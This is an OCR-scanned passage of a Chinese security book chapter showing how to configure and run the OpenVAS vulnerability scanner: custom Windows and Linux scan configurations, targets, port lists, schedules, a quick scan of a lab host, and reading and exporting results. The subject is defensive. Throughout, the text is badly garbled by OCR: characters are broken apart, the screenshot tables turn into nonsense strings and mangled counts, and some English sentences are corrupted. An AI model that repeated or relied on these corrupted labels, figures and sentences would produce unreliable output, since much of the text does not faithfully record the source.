e Manager 组 件 : 用 于 管理 Scanner 组 
件 ， 所 有 的 配置 信息 保存 在 Configs 
数据 库 中 。 

e CLI 组 件 : 指令 控制 组 件 ， 用 于 对 
Manager 下 达 指 令 。 

e@ Security Assistant 组 件 ， 用 于 分 析 扫 
描 漏洞 并 生成 报告 文档 。 


Edit My Settings 
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首次 登录 OpenVAS， 可 以 修改 一 些 基 
本 信息 。 操 作 步 又 如 下 : 
[Sep 加 在 OpenVAS 首 页 中 ， 选 择 Extras 菜 单 ， 
在 打开 的 菜单 列表 中 选择 My Settings 菜 单 命 
令 ， 如 下 图 所 示 。 


Trashcan 


Performance 
CVSS Calculator 
Feed Status 


step 图 在 OpenVAS 中 ， 如 果 需 要 修改 信息 ， 
都 可 以 找到 一 个 类 似 扳 手 的 图 标 ， 如 下 图 
所 示 。 


| My Settings 
单 击 扳手 图 标 ， 进 入 基本 设置 修改 页 
面 ， 如 下 图 所 示 。 在 这 里 可 以 修改 时 区 、 
用 户 密 码 以 及 语言 环境 等 。 


Name Value 


Timezone 


Password 


New 


User Interface Language 


| Coordinated Universal Time ~ 


Browser Language 


Rows Per Page 10 

Details Export File Name 9%T%U 

List Export File Name %T%D 

Report Export File Name %T%U 

Severly Class NVD Vulnerability Severit v 
Dynamic Severity No 

Default Severity 100 


step 国 默认 情况 下 ，OpenVAS 的 漏洞 评测 标准 是 NVD 模 式 ， 如 果 需 要 修改 ， 可 以 单 击 


Severity Class 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 选择 不 同形 式 的 评分 标准 ， 如 下 图 所 
示 ， 其 中 包括 BSI[、OpenVAS、PCI-DSS 等 标准 。 
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Details Export File Name 


BSI Schwachstellenampel 
(Germany) 


OpenVAS Classic 
PCI-DSS 


List Export File Name 
Report Export File Name 
Severity Class 
Step 图 设置 完成 后 ， 单 击 下 方 的 Save 按 
钮 ， 即 可 保存 设置 ， 并 退出 基本 设置 修改 
页 面 。 


12.4.4” 自 定义 扫描 


默认 情况 下 ，OpenVAS 提 供 了 多 种 扫 
描 配 置 ， 不 过 这 些 都 是 通用 的 ， 如 果 需 要 
针对 某 些 特定 的 设备 进行 扫描 ， 则 需要 自 
定义 配置 。 


NVD Vulnerability Severit... ~ 


1. 设置 扫描 配置 


开始 扫描 之 前 需要 先 设置 一 个 扫描 配 
置 ， 创 建 自 定义 扫描 配置 的 操作 步骤 如 下 : 
[sep 园 选择 Configuration 茉 单 ， 在 打开 的 菜 


上 Configs (8 of 8) 


mpty 
人 Empty an 


Full and fm 
(Most NVT's; optimized by using previously collected information ) 


Host Discovery 
(Network Hos Discovery scan configuration ) 


System Discovery 
(Nacwork Systam Discovery scan configuration) 


step 图 单 击 左上 方 的 “创建 ”图 标 ， 可 以 创 
建 自 定义 配置 ， 如 下 图 所 示 。 


a Scan Configs 
Estee 加 打开 New Scan Config 对 话 框 ， 在 其 中 
输入 新 建 扫描 的 名 称 、 备 注 信息 以 及 基础 
配置 ， 如 下 图 所 示 。 


©) Empty satic and iast 
Ful and as 
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单列 表 中 选择 Scan Configs 菜 单 命令 ， 如 下 
图 所 示 。 


Targets 


Port Lists 
Credentials 


[step 图 打开 Scan Configs 对 话 框 ， 在 其 中 可 
以 查看 OpenVAS 的 默认 扫描 配置 项 ， 如 下 
图 所 示 ， 包 括 Discovery (发 现 型 扫描 ) 、 
empty( 一 个 空 的 扫描 ) 、Full and fast( 完 
整 的 快速 扫描 ) 、Full and fast ultimate( 完 
整 快速 极限 扫描 ) 、Full and very deep( 非 
常 深度 扫描 ) 、Full and very deep ultimate 

(深度 极限 扫描 ) 、Host Discovery (主机 
发 现 扫 描 ) 、System Discovery (系统 发 现 
扫描 ) 等 ， 除 此 之 外 还 可 以 看 到 每 个 扫描 
配置 的 漏洞 分 类 以 及 NVT 数 量 。 


2 © 27 品 Buc0 
国 。 上 9 Geo0 
图 62 e034 uo0 
四 ez 器 so 口 BO0 
加 o: 已 asoxa 品 Bec0 
四 ez © «04 口 BOO 
2 2 co auc0 
时 6 昌 2 © Guo0 


step 图 输入 完成 后 ， 单 击 Create 按 钮 ， 进 入 


编辑 扫描 配置 界面 ， 如 下 图 所 示 。 


Windows-scanl 


Comment 


Base (©) Emply, static and fast 


Full and fast 


[step 较 在 Family 选 项 中 有 两 个 单 选 按钮 ， 其 
中 第 1 个 是 箭头 向 上 的 图 标 ， 选 中 它 代表 如 
果 后 续 有 漏洞 更 新 自动 加 入 扫描 配置 ， 箭 
头 向 右 的 图 标 如 果 选 中 ， 代 表 仅 当 前 这 些 


配置 项 ， 即 使 后 续 有 更 新 也 不 自动 添加 ， 
如 下 图 所 示 。 这 里 建议 选择 第 1 项 ， 如 有 特 
殊 需 要 可 以 选择 第 2 项 。 


Family 仿 国人 


[step 园 因为 这 里 的 配置 是 针对 Windows 系 
统 的 漏洞 扫描 ， 因 此 会 去 除 一 些 不 必要 的 


漏洞 扫描 。 配 置 项 1 如 下 图 所 示 ， 其 中 包 
括 Brute force attacks (暴力 破解 ) 、Buffer 
overflow (缓冲 区 溢出 ) 、Compliance ( 合 
规 性 ) 、Databases (数据 库 ) 等 。 


en 

© 加 

® 加 

© 加 

加 
centos ora Do 加 
Civix Xonserver Local Secunty Checks 0of30 [7 = 加 
Complance gol7 GS 器 加 
Datapases orss0 Cn | 加 


配置 项 2 如 下 图 所 示 ， 其 中 包括 
Default Accounts (默认 账户 ) 、Denial 
of Service〈 拒 绝 服务 ) 、FTP 《FTP 服务 
器 ) 、Finger abuses (混用) 、Gain a shell 
remotely (远程 获取 shell) 、General (通用 
性 ) 等 。 


aa Cs 可 加 
oor13s6 [7 OL*] 日 回 
Fy Local secunly checks vorlzs Oo 
pr oof173 Leo 日 回 
0ofl0616 Qe 回 
oof6 eo 日 
tewalls oor18 Oe 回 
orios Local Sacuriy Checks 0of34 UF De] 加 
0or437 © 加 
oofloe -| 日 
9 ol4299 Dec | 图 
Eee 加 配置 项 3 如 下 图 所 示 ， 其 中 包括 


Malware( 恶 意 软件 ) 、Nmap NSE (Nmap 
脚本 ) 、Nmap NSE net (Namp 网 络 脚本 ) 、 

Peer-To-Peer File Sharing (点 对 点 文件 共 
享 ) 、Policy (策略 ) 、Port scanners 〈 端 
口 扫 描 ) 、Privilege escalation 〈 提 权 ) 、 

Product detection (产品 检测 ) 、RPC 等 。 
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PEwae 106155 LP Ol 可 
Mancrake Local Security Checks 0of402 已 加 3 
es 5 em 
Nmap NSE 0of154 7 OI | 回 
| RT geo 日 
De i en 
0 oD 
ne 也 oD 加 
0 of656 局 ec 加 加 
外 oD 日 
ee Oe 器 
0of2059 De 器 
去 -| 器 
[step 园 配置 项 4 如 下 图 所 示 ， 其 中 包括 Remote 


file access (远程 文件 访问 ) 、SMTP problems 
(SMTP) 、SNMP (SNMP) 、 SSL and TLS 
(SSL 和 TLS 协 议 ) 、Service detection 〈 服 务 

检测 ) 、Settings (设置 ) 、Useless services 
(无 用 的 服务 ) 等 。 


Romow Wo accoss ol5 Ue [| 
ool52 ue 可 
wp oo7 Oo 回 
0of63 7Dn] 器 
0of217 ee 四 | 
Betings 0of12 局 c 铝 | 
Siackware Local Secunly Checrs 0of534 OS 
Eapns Local Secunity checes oofl DeD 
0 ol1426 [7 Ol=| 
oof31l9 Dem 
0of14 Oe [el 
0of59 OD 
es 0of400 gen [ml 


[Ses 图 配置 项 5 如 下 图 所 示 ， 其 中 包括 
Windows 以 及 Windows:Microsoft Bulletins 
(微软 公告 ) 等 。 


oni 7 OL= 
oor1907 


oofo -| 


[step 了 加 设置 完成 后 ， 单 击 Save 按 钮 保存 配 
置 ， 再 返回 界面 的 下 方 ， 可 以 看 到 已 经 
添加 了 自 定 义 扫 描 项 ， 具 体 信息 包括 27 项 
19059 种 漏洞 ， 如 下 图 所 示 。 至 此 ， 便 成 功 
创建 了 针对 Windows 系 统 的 扫描 配置 。 


四 > E] ET 
到 日 2 9 AGol 
27 i909 © ol 


人 @ 注 意 : 自 定义 扫描 项 的 右 侧 提 供 了 删 
除 、 修 改 、 复 制 、 导 出 功能 ， 默 认 配 置 项 
是 不 可 以 删除 和 修改 的 。 
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2. 创建 扫描 对 象 


开始 漏洞 扫描 之 前 需要 确定 扫描 对 象 ， 
而 OpenVAS 中 任何 的 动作 都 需要 提前 进行 
配置 。 创 建 扫描 对 象 的 操作 步骤 如 下 : 
[step 图 选择 Configuration 菜 单 ， 在 打开 的 
菜单 列表 中 选择 Targets 菜 单项 ， 如 下 图 
所 示 。 


Port Lists 


Credentials 
Scan Configs 


在 打开 的 界面 中 ， 单 击 左 上 角 的 “ 创 


N 


建 ” 图 标 ， 创建 目 标 对 象 如 下 图 所 示 。 


[step 图 打开 New Target 对 话 框 ， 在 其 中 输入 
目标 名 称 ， 如 下 图 所 示 。 目 标 地 址 有 两 种 
方式 : 

(1) 选择 Manual 项 ， 可 以 直接 输入 IP 地 
址 ， 多 地 址 之 间 使 用 去 号 分 隔 。 

(2) 选择 From file 项 ， 可 以 将 需要 扫描 的 
IP 地 址 保存 成 文件 ， 最 后 导入 该 文件 。 


Name Winodw-PC1 


Comment 


®) Manual 


Hosts From file 


选择 需要 扫描 的 端口 ， 这 里 提供 了 
非常 多 的 选项 ， 有 和 针对 TCP/UDP 的 单独 选 
项 ， 还 有 针对 常用 端口 的 选项 以 及 全 端口 
扫描 等 。 这 时 可 以 单 击 下 拉 按 钮 ， 在 弹出 
的 下 拉 列 表 中 进行 选择 ， 如 右 图 所 示 。 这 
里 选择 OpenVAS Default 选 项 ， 当 然 如 果 想 
自 定义 端口 ， 也 可 以 单 击 右 侧 的 “创建 ” 
图 标 自行 创建 。 


[step 图 主机 探测 也 同样 提供 了 丰富 的 选项 ， 
这 里 选择 Consider Alive 选 项 ， 即 使 主机 不 
响应 探测 数据 包 ， 也 依然 认为 主机 是 存活 
状态 ， 并 完成 扫描 ， 如 右 图 所 示 。 


192.168.1.103 


Browse- No file selected. 


AIl IANA assigned TCP 20... 2 


Alive Test 


Credentials for authenticated yor 人 
All TCP 
SSH 
All TCP and Nmap 5.51 
SMB top 100 UDP 
ESXi Nmap 5.51 top 2000 
TCP and top 100 UDP 
SNMP 
~ 
Port List OpenVAS Default "|E 
Alive Test Consider Alive v 
Credentials for 
authenticated che 


step 较 基本 选项 都 设置 完成 后 ， 单 击 Create 按 钮 ， 即 可 完成 创建 。 在 返回 的 页 面 中 可 以 看 


到 已 经 创建 好 的 主机 列表 ， 如 下 图 所 示 。 


的 | (1 of 1) 


Windwos-PC1 192.168.1.103 1 OpenVAs Default 


目 劝 已 吕 
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人 移 注 意 : 在 Configuration 菜 单列 表 中 有 一 个 Port Lists 菜 单 ， 通 过 这 个 菜单 可 以 修改 扫描 的 
端口 。 修 改 后 的 端口 列表 如 下 图 所 示 。 


提 Port Lists (9 of 9) 
[poncooms aeons 
| 
AIlIANA assigned TCP 2012-02-10 是 5625 5625 o 日 0 
AIlIANA assigned TCP and UDP 2012-02-10 国 109s8 5625 5363 [a [=[ | 
all privileged TCP 四 1023 1023 o [a ie[:| 
All privileged TcP and UDP 加 2046 1023 1023 目 回 器 0 
AllTcP 局 65535 65535 0 同 西口 四 
AllTCP and Nmap 5.51 top 100 UDP 国 65634 65535 99 园丁 口上 四 
AIITCP and Nmap 5.51 top 1000 UDP 加 66534 65535 999 加 西口 四 
Nmap 5.51 top 2000 TCP and top 100 UDP 国 2098 1999 99 目 加 已 四 
| openvas Default 图 4481 4481 0 目 可 口中 


3. 创建 扫描 任务 


设置 完 自 定义 扫描 配置 并 创建 好 扫描 对 象 后 ， 接 下 来 便 可 以 创建 一 个 扫描 任务 。 
OpenVAS 的 扫描 任务 设置 也 是 非常 的 灵活 ， 可 设 定 在 规定 的 时 间 进 行 扫描 ， 也 可 设置 周期 
性 扫描 ， 这 样 更 加 符合 漏洞 管理 的 要 求 。 创 建 扫描 任务 的 操作 步骤 如 下 : 
Eee 加 创建 一 个 扫描 调度 计划 ， 选 择 在 打开 的 界面 中 ， 单 击 左 上 角 的 “ 创 
Configuration 菜 单 ， 在 打开 的 菜单 列表 中 选 ” 建 ” 图 标 ,创建 一 个 扫描 任务 ， 如 下 图 所 示 。 
择 Schedules 菜 单项 ， 如 下 图 所 示 。 画 百 


Schedules 


step 图 打开 Edit Schedules 对 话 框 ， 在 其 中 可 


a 以 设置 调度 的 名 称 ， 可 以 选择 初次 扫描 的 
es 时 间 ， 还 可 以 选择 以 后 计划 扫描 的 时 间 ， 
如 下 图 所 示 。 


Edit Schedule 


Name everyday _scan 


Comment 


First Time Tuesday 30 October, 2018 at 国 二 | po 转 " 


Timezone Coordinated Universal Time ~ 


por 二 - 
Duration [5 国 hour(s) et 


step 园 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 调度 任务 ， 如 下 
图 所 示 。 
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KT™ 
2 Schedules (1 of 1) 


everyday scan TueOct3003:10:002018 UTC Wed Oct 31 03:1020 2018 UTC lday ”shours 日 @CO 


yao 回回 


step 图 选择 Scans 菜 单 ， 在 打开 的 菜单 列表 [step 园 在 打开 的 界面 中 ， 单 击 左 上 角 的 “ 创 
中 选择 Tasks 菜 单项 ， 如 下 图 所 示 。 建 ” 图 标 ， 创 建 一 个 扫描 任务 ， 如 下 图 所 示 。 


三 | 
VY Tasks 


Reports 


Results 


打开 New Tasks 对 话 框 ， 在 其 中 可 以 设置 扫描 任务 的 名 称 ， 还 可 以 调用 之 前 创建 好 的 
调度 配置 、 扫 描 配 置 等 ， 如 下 图 所 示 。 


New Tas 
Name 。 New Scan 
Comment 
ScanTargets | Windwos-PC1 "| 加 
Alerts [| 
Schedule everyday _scan ” once 器 
Addresultsto (yes no 
Assets 
Apply Overrides yes Ono 
Min QoD |7o 图 % 
Amerable Task yes 加 mo 


Auto Delete 。 (9) Do notautomatically delete reports 
Re 
Automatically delete oldest reports but always keep newest[ 5 国 por 
Scanner 。 | OpenVAS Detault 


Scan Config Windwos-scan 


[step 图 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 扫描 任务 ， 如 下 
图 所 示 。 


[repors [sovers a 


New_Scan 加 中 昌 加 CO 
Rppy to pooe conterts 7 站 可 


侈 注意 : 右 侧 的 时 钟 图 标 可 以 修改 调度 计划 ， 类 似 播 放 按 钮 可 以 在 计划 启动 后 停止 当前 
扫描 任务 。 


4. Linux_Unix 扫 描 配 置 
前 面 学 习 了 如 何 创建 自 定义 扫 描 ， 这 里 再 给 出 一 个 自 定义 Linux 系 统 的 扫描 配置 ， 相 
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信 经 过 这 两 种 系统 的 配置 ， 读 者 一 定 能 
掌握 创建 自 定义 扫描 配置 的 方法 。 

创建 Linux 扫 描 配置 也 需要 经 历 相同 的 
一 些 步骤 ， 这 里 省 去 了 相同 的 步骤， 只 给 
出 最 终 的 配置 项 ， 所 需 步 又 如 下 : 
[Sep 国 通过 新 建 扫描 配置 ， 也 可 以 通过 复制 
已 有 的 扫描 配置 进行 修改 。 这 里 选择 复制 
已 有 的 扫描 配置 进行 修改 ， 在 扫描 配置 页 
中 选择 左 侧 的 复制 图 标 ， 在 打开 Edit Scan 
Config 对 话 框 中 输入 扫描 配置 名 称 ， 如 下 图 
所 示 。 


dit Scan Config 


| Linux_Unix_Scan 


Comment | Most NVT's; optimized by using previous 


Edit Network Vulnerability Test Families 


step 图 Linux 配 置 项 1， 如 下 图 所 示 。 


AIXLocal securly Checks 1of1 G08 日 
Amazon Linux Local Securlty Checks 748 ol743 Orgm| [5 
Brute force attacks 9of9 Ox | 口 
Buferoverlow 552 of562 OF Ow 日 
cisco 6i7 of647 23005 
CentOS Local Security Checks 2471012471 oo [sl 
Citix Xenserver Local Security Checks 30 of30 [za-| 口 
Complance 7of7 © 局 
Databases 550 of550 ?DC 口 


由 Linux 配 置 项 2， 


Deblan Local Securlty Checks 2830 of 2830 oO 回 
Detault Accounts 216 of216 OF 回 
Denlal of Service 1356 of1356 On| 回 
F5 Local Security Checks 125 of 125 OF 


FTP 173 of173 CO 7 


回 


Fedora Local Security Checks 10616 of10616 OF 


口 


Finger abuses 6of6 O 7 


加 


Firewalls 180f18 OF 


ForlOS Local Securly Checks 34of34 oO 


FreeBSD Local Security Checks 437 0f437 OF 


回回 六 


Gain a shell remotely 106 of106 OF 


General 4298 of4299 oO 7 


Gentoo Local Securiy Checks 6930f693 oO 


O0000000000000 
[ea I 


HP-UX Local Security Checks 


step 园 Linux 配 置 项 3， 


150f15 oO 


回 


如 下 图 所 示 。 
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IFGrundschutz 109 of109 OF 
IFGrundschutz.10 91of91 2 忆 DC 已 
IFGrundschutz-11 102of102 OFS 
IFGrundschutz-12 85of85 Oz "| 器 
ITFGrundschutz-13 85 of85 OF =| 加 
IFGrundschutz.15 85of85 Or 加 
JunOS Local Security Checks 136 of136 OF [nm | 
Mac OS X Local Security Checks 1930f193 Ow| 日 
Mageia Linux Local Security Checks 329 of329 OF 加 
Malware 50of50 3 局 -总 
Mandrake Local Securly Checks 402 01402 Or =| 四 | 
Neware 8of8 O70 | 
Nmap NSE 15401154 Or +| 日 
Nmap NSE net 177of177 OF =| 加 
step 图 Linux 配 置 项 4， 如 下 图 所 示 。 

Oracle Linux Local Securlty Checks 1895 of1895 GO 器 
palo Aho PAN-OS Local Security Checks 40of40 OO 回 
Peer-To-Peer Fle Sharing 21of21 GDC5E 日 
Polcy 656 of 656 [Or ~+| 回 
Pon scanners 2of15 I Ol ] 
Prwlege escalabon 60of60 GDCB 日 
Productdetecton 2059 of 2059 OoDC 四 | 
RPC 11ofll OODC5 器 
Red Hal Local Securlly Checks 1574 of 1574 [Or @~| 回 
Remote We access 58 of58 OoDC5 加 
SMTP problems 52of52 GCC [| 
SNMP 7of7 oO 四 | 
SSLandTLS 63of63 [G = 思 =] | 
Sevice detecton 216 01217 [DO 7 +| 回 
Linux 配 置 项 S， 如 下 图 所 示 。 

Setngs 120112 SOO 器 
Slackware Local Security Checks 534 01534 GDC 
Solaris Local Securly Checks 1oll ©@BOS 回 
SuSE Local Security Checks 1426 of1426 [D7 m+ 加 
Ubuntu Local Security Checks 3119 of3119 [OW 
Useless sevices 14of14 GDcCS | 
VMware Local Securiy Checks 58 of58 Ox)| 
Web Servers 400 of 400 © 加 
Web apphcaton abuses 5654 of 5655 DC 器 
Windows 181of181 DC ] 
Windows . Microsof Bulleuns 1967 of1967 -| ] 


Toalez se034or48050 加 


5. 快速 扫描 


除了 自 定义 扫描 外 ，OpenVAS 还 提供 
了 一 个 快速 扫描 设置 ， 输 入 一 个 主机 地 址 
便 可 以 开始 快速 扫描 。 进 行 快速 扫描 的 操 
作 步 又 如 下 : 


Zl 
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step 国 在 创建 扫描 任务 界面 中 有 一 个 魔法 棒 图 标 国 ， 如 下 图 所 示 。 
画 匡 百 


— 


[step 图 单 击 魔法 棒 图 标 国 ， 便 可 以 进入 快速 扫描 设置 界面 。 在 IP 地 址 栏 中 输入 一 个 主机 地 
址 ， 如 下 图 所 示 。 


Task Wizard 


/Quick start: Immediately scan an IP address 
IP aadress or hostrame: 
1921631103 


The eralit S05s SS einer Your COTPUIE of YOU networe galeway. 
As a shor-cut | will do the following for you 


1 Create a new Target 
2 Creaio a new Tack 

3 Star thls Scan sk nght away 

4 Switch the view to reloed every 30 seconds so you can lean back and watch the scan progress 


In act you must not lean bact. As soon as the scan proyess ls beyond 1%, you can aheady Jump mi 
the scan Iepor via the Ink in the Repon's Total column and review the results calected so fa 


When creating the Target and Task | wi use Ine detaults zs configured In "My Setrings 


和 
| aaa 
[ep 图 单 击 Start Scan 按钮 ， 便 可 以 开始 一 个 快速 扫描 。 此 时 在 扫描 任务 列表 中 便 会 有 一 个 
已 启动 的 扫描 计划 ， 如 下 图 所 示 。 


Reports 
有 村 医 司 
[EC 


Immediate scan of IP 192.168.1.103 00) DOBGSCUO 


step 园 单 击 左 侧 hame 中 的 名 称 ， 可 以 打开 快速 扫描 中 给 出 的 配置 项 ， 如 下 图 所 示 。 


Task: Immediate scan of IP 192.168.1.105 


Name: Immediate scan of IP 192.168.1.105 
Comment: 
Target Target for immediate scan of IP 192.168.1.105 
Alerts: 
Schedule (Next due: over) 
Add to Assets: yes 

Apply Overrides: yes 

Min QoD: 70% 
Alterable Task no 
Auto Delete Reports: «& Do not automatically delete reports 
Scanner OpenVAS Default (Type: OpenVAS Scanner) 


Scan Config: Full and fast 
Order for target hosts: N/A 
Network Source Interface: 
Maximum concurrently executed NVTs per host: 10 
Maximum concurrently scanned hosts 30 

Status: Lix | 

Duration of last scan: 

Average scan duration 


Reports: 1, Current: Oct 30 2018 (Finished: 0) 
Results: 10 
Notes: 0 
LOverrides- 0 


12.4.5 ”结果 及 其 他 


通过 前 面 的 学 习 相 信 读 者 已 经 可 以 配置 并 开启 一 个 扫描 了 ， 下 面 介绍 OpenVAS 中 扫描 
结果 以 及 一 些 其 他 功能 。 


区 到 


第 12 章 无 线 网 络 中 主机 漏洞 的 安全 防护 


1. 扫描 结果 

当 扫 描 进行 到 一 定 程度 ， 不 但 可 以 看 到 扫描 的 进度 状态 ， 还 可 以 查看 目前 已 经 扫描 出 
的 结果 。 查 看 扫描 结果 的 操作 步骤 如 下 : 
[se 加 在 扫描 任务 列表 中 Status 项 ， 指 出 了 当前 扫描 的 进度 ， 如 下 图 所 示 。 


orts 
Severity Trend 
st 


Immediate scan of IP 192.158.1.105 oy DOSGou 
CT 


step 图 单 击 Status 中 的 扫描 进度 ， 便 可 以 打开 Report: Results 界 面 ， 如 下 图 所 示 。 该 界面 会 
按照 漏洞 威胁 程度 进行 排列 。 


D370B0 O79 WE 66-CHOeDe0G06| 
Nodifed 


@ Report: Results (10 of 100) eg 


Gener,_aemn, | 


30 0473732018 


nent “22 |oo0 vest teaton]Actons | 


Check for riogin Service BB WL 70% 192.168.1.105 513/tcp 
UnreallRcd Authentication Spoofing wunerablity 襄 ED 0% 192.168.1.105 6657ktcp 因 国 
Anenymous FTP Login Reporting 书本 0% 192.108.1105 21rcp 四国 
check if Malserver answer to VRFY and EXPN requests 日 99% 192.1681105 :srcp 四国 
SSU/TLS: Deprecated SSLv2 and SSLY3 Protocol Detection 书 ENDZTTD sex 192.1681105 54zncp 四 国 
SS5UTLS, ppteuated 5sLvz ad 55L73 nutucul Detection 回 ES yo 1921001105 25tp 四 国 
SSL/TLS: RSA Temporary Key Handing RSA_EXPORT Downgradelssue 下 

本 ry Key g SA 9 口 iT sox 192.168.1.105 25tcp ”办 靖 
SSULS: SSLv3 Protocol Cac Cipher Suites Information Disclocure 3 LT 

Wlnerabilty (POODLE) EE 80% 192.168.1.105 5432/tcp 四 天 
SSL/TLS: SSLv3 protocol Cac Cipher Suites Information Disclasure rm 
ae EE 80% 192.168.1.105 25tcp ”四 国 
SSH Weak MAC Algorithms Supported 加 95% 192.1681105 2tcp ”四 国 


[Eee 图 单 去 Vulnerability 中 的 任意 一 项 ， 可 以 打开 该 漏洞 的 简要 信息 ， 如 下 图 所 示 。 其 中 包 
括 该 漏洞 的 一 个 简要 报告 、 存 在 的 位 置 、 威 胁 程度 以 及 修复 建议 等 。 


ee 
Phpinfo0 output Reporting a0% 1921681105 aohicp 

Summary 

Many PHP installation tutoriale instruct the user to createa file caled phpinfo php 0 smilar containing the phpinfol) statement Such a filo 
often left back in the webserver directory. 

Vulnerability Detection Result 

The following files are calling the function phpinfo() which disclose potentially sensitive infornation: 
http://192.168.1.105/mutillidae/phpinfo .php 

http://192.168.1.105/phpinfo. php 

Impact 

Snme nf the information fhar can he 9athered from this feincludes 

The username of the user running the PHP process, fF it is a sudo user, the IP address of the host, the web server version, the system version 
{Unix, Linux, Windows, ...), and the root directory of the web servar. 

solution 

Solution type: © workarourd 

Delete the listed files or restrict access to them. 


Vulnerability Detection Method 
Details: phpinfo() output Reporting (OID: 1.3.6.1.4.1.25623.1.0.11229) 


Version used: $Revision: 11992 $ 


侈 提示 : 扫描 出 的 漏洞 并 不 完全 准确 ， 需 要 后 续 的 验证 ， 如 果 确 实 存在 可 以 使 用 漏洞 列 
表 左 侧 的 图 标 为 其 添加 注释 信息 。 这 个 可 以 通 ey 
如 果 扫 描 出 的 漏洞 并 不 存在 ， 这 里 只 是 误 报 ， 再 或 者 漏洞 确实 存在 但 威胁 并 没有 那么 

这 时 可 以 调整 漏洞 评分 ， 通 过 单 击 最 右 侧 的 Add Override 按 钮 ， i 
对 话 框 中 进行 调整 ， 如 下 图 所 示 。 
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NvrName OEE IL eon 


D yes, aways 


yes,orthanext | 30 | days 


no 


Hosts Amy © 1921631105 
Location = Mmy (© generaltcp 
Severty Any 回 >00 
NowSeverty 加 | Faseposnve omer 
Task Any ©) mmedateqt20seangt20op620IPW20192 168.1105 
Resut (© Amy Onlyth: selacied one (3aa6373-080F4a57-8015-d638ca60a599) 
Text 


Step 加 扫描 结束 后 可 以 通过 左上 方 选择 不 同 
的 格式 导出 扫描 报告 ， 如 下 图 所 示 。 
“] 回 昌 瑟 


台电 


Anonymous XML 


@ Report: Results (52 of 373) 


[6 图 这 里 包含 了 大 量 的 导出 格式 ， 单 击 导 
出 格式 右 侧 的 下 拉 按 钮 ， 可 以 在 弹出 的 下 
拉 列 表 中 进行 选择 。 这 里 以 导出 PDF 格式 为 
例 ， 如 下 图 所 示 。 

LaTeX 

NBE 


Topology SVG 


TXT 


[step 轩 选择 完 导 出 格式 后 ， 单 击 向 下 箭头 的 
图 标 可 以 导出 扫描 报告 ， 同 时 可 以 选择 直 
接 打 开 或 存放 到 某 一 位 置 ， 如 下 图 所 示 。 


2. 其 他 功能 


Opening report-c3771d60-0794-4416-8856-cace0e048d65xml 办 
Yourave chosento oper 
report-c3771660-0794-446-8866-c8de0e048d65 xml 


Whichis: XML 文 乱 (497 KB) 
from httpsy1127.0.0.1.9392 


What should Firefox do withthis file? 
Dpenwith 文本 编辑 绪 (default) we 
Sve File 


Do this automatically for files like thls from now on 


Cancel | ok | 


[step 国 如 果 选 择 直接 打开 ， 可 以 直接 打开 


并 导出 扫描 报告 ， 如 下 图 所 示 。 可 以 看 到 
OpenVAS 会 按照 分 类 生成 PDF 格式 的 文档 。 
这 个 文档 的 可 读 性 还 是 很 高 的 ， 主 要 包括 漏洞 
的 分 析 、 修 复方 案 以 及 修复 补丁 的 地 址 等 。 


右 ”: a%n 7 pear7ld6007944- | st al = O00 
~ Result Overview 3 a 

HostAuthentlcatons 3 
~ Results per Host 3 
* 192168.1105 3 
Highsoncp 5 
High1099hcp 。 10 
Hignslahcp 了 
Highstcp 3 


High6zoomcp 12 
High generahep 93 
High21/tcp 14 
Highl524hcp 15| 
Highslzhcp 15 
High3306hcp 。 16 
Hghns4azhep 17 
Highs59ooncp 18| 
High3632hcp 18 
Hign22htcp 13 
Medium aocp 20| 
Medum2litcp 29 
Mecium 6667/tep 30| 


除了 上 述 介绍 的 功能 外 ，OpenVAS 还 提供 有 很 多 其 他 功能 ， 下 面 分 别 进行 介绍 。 
(1) 以 图 表 的 形式 查看 扫描 报告 功能 。OpenVAS 会 将 扫描 的 漏洞 以 图 表 的 形式 进行 
展现 ， 通 过 选择 Assets 菜单 下 的 Operating Systems 菜单 项 可 以 以 图 表 形式 查看 扫描 报告 


如 下 图 所 示 。 


os, Operating Systems (6 of 6) 


Operating Systems by Severity C... ~ Operating Systems by Vulnerabil. ~ Operating Systems by CVSS (Tota... 


国 high 


60 
cpe:/o:linux:kemel 5.5 
50 
Jo:canonical:ubuntu linux 45 
40 
cpe:/o:microsoft-windows| 35 
3.0 
nonicalubuntu_linux:8.04 25 
20 
Jo:deblandeblan linux| 15 
1.0 
Jormicrosofcwindows_xp 05 
00 十 
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(2) 以 不 同 评分 参考 标准 展现 扫描 结果 。 在 OpenVAS 中 给 出 了 不 同 的 漏洞 评分 参考 
标准 ， 并 以 图 表 或 详细 列表 的 形式 进行 展现 。 该 功能 存放 在 SecInfo 菜单 列表 之 中 ， 如 下 


图 所 示 。 
Conpouration 
Dashboard 
NVTs 
cvEs 
cpes 
OVAL Definitions 


CERT-Bund Advisories 
DFN-CERT Advisories 


(3) 以 NVTs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 NVTs 菜单 命令 ， 在 打开 的 下 图 所 示 
的 界面 中 列 出 了 使 用 NVTs 参考 的 漏洞 图 表 展示 ， 以 及 漏洞 数量 。 


和 ， 


VTs (48054 of 48054) 


~ NVTs by Severity Class (Total: 430. 


(4) 以 CVEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CVEs 菜单 命令 ， 在 打 
的 界面 中 列 出 了 使 用 CVEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


5 


@ cvEs (114679 of 114679) 


(5) 以 CPEs 参考 标准 展示 漏洞 图 表 功 能 。 选 择 CPEs 菜单 命令 ， 在 打 
了 使 用 CPEs 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


的 界面 中 列 出 


~ CVEs by CVSS (Total: 114679) 


40.000- 
35,000: 
30.000, 
25.000: 
ao 
35o0， 
onoo， 

So 


WAS TII4sE78 9 


开 的 下 图 所 示 


开 的 下 图 所 示 


300.000 


250,900 


全 


0 0 
19901455200020052010201s 


200900 4 


~ CPEs by CVSS (Total: 286689) 


0 
WAS TE34567891 
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(6) 以 OVAL 参考 标准 展示 漏洞 图 表 功 能 。 选 择 OVAL Definitions 菜单 命令 ， 在 打开 
的 下 图 所 示 的 界面 中 列 出 了 使 用 OVAL 参考 标准 展示 的 漏洞 图 表 ， 以 及 漏洞 数量 。 


|owz 
_0 


OVAL Definitions (28175 of 28175) 四 


国 inventory 

国 miscellaneous 
是 pat 

国 vonerabiity 


